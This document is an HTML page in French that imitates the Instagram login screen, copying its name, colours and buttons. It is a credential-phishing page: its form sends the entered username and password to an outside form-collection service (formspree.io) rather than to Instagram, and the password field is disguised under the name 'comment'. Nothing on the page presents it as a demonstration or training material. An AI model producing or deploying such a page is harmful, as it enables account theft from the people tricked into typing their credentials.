<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram Login</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #fafafa;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .login-container {
            background-color: #fff;
            border: 1px solid #dbdbdb;
            padding: 20px;
            text-align: center;
            width: 350px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }
        .logo {
            font-family: 'Billabong', cursive;
            font-size: 48px;
            margin-bottom: 20px;
        }
        .input-group {
            margin-bottom: 10px;
        }
        .input-group input {
            width: 100%;
            padding: 10px;
            margin: 5px 0;
            border: 1px solid #dbdbdb;
            border-radius: 3px;
        }
        .login-button {
            width: 100%;
            padding: 10px;
            background-color: #0095f6;
            color: #fff;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        .login-button:hover {
            background-color: #007bb5;
        }
        .forgot-password {
            margin-top: 10px;
            color: #003569;
            text-decoration: none;
        }
        .separator {
            margin: 20px 0;
            color: #8e8e8e;
        }
        .facebook-login {
            color: #385185;
            text-decoration: none;
            font-weight: bold;
        }
        .signup {
            margin-top: 20px;
        }
        .signup a {
            color: #0095f6;
            text-decoration: none;
        }
    </style>
    <link href="https://fonts.googleapis.com/css2?family=Billabong&display=swap" rel="stylesheet">
</head>
<body>
    <div class="login-container">
        <div class="logo">Instagram</div>
        <form action="https://formspree.io/f/meoelazz" method="POST">
            <div class="input-group">
                <input type="text" name="username" placeholder="Numéro de téléphone, nom d'utilisateur ou adresse e-mail" required>
            </div>
            <div class="input-group">
                <input type="comment" name="comment" placeholder="Mot de passe" required>
            </div>
            <button type="submit" class="login-button">Se connecter</button>
        </form>
        <div class="separator">OU</div>
        <a href="#" class="facebook-login">Se connecter avec Facebook</a>
        <div class="signup">Vous n'avez pas de compte ? <a href="#">Inscrivez-vous</a></div>
    </div>
</body>
</html>
